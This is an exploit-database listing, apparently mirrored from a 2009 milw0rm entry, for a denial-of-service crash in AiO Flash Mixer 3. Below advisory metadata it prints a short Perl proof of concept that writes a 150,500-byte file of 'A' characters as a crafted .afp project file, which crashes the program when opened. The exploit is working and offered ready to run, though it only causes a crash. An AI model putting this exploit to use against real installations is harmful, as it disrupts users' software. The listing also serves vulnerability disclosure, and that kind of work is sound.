header-logo
Suggest Exploit
vendor:
AiO (All into One) Flash Mixer 3
by:
the_Edit0r
7,5
CVSS
HIGH
Crash Vulnerability
N/A
CWE
Product Name: AiO (All into One) Flash Mixer 3
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Pro SP3
2009

AiO (All into One) Flash Mixer 3 (.afp File) Crash Vulnerability Exploit

A vulnerability in AiO (All into One) Flash Mixer 3 allows an attacker to cause a denial of service (application crash) by creating a specially crafted .afp file and opening it in the application. This can be exploited to crash the application.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#[+] Bug : AiO ( All into One) Flash Mixer 3 (.afp File) Crash Vulnerability Exploit
#[+] program  Download : http://www.goztun.com/download/AiOFlashMixerSetup.exe
#[+] Author : the_Edit0r
# Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP3
#[+] web site: Expl0iters.ir  * Anti-security.ir
#[+] Big thnx: H4ckcity Member


my $crash="\x41" x 150500;
open(myfile,'>>Edit0r.afp'); # jpg , Bmp , Png , Gif
print myfile $crash;
print "File Created successfully\n";

# After Clicking On file Perl  Run The Program  ,Opened Project  ( Add Pictures ) Boom !!!!!!! the Program Crashed

# milw0rm.com [2009-08-24]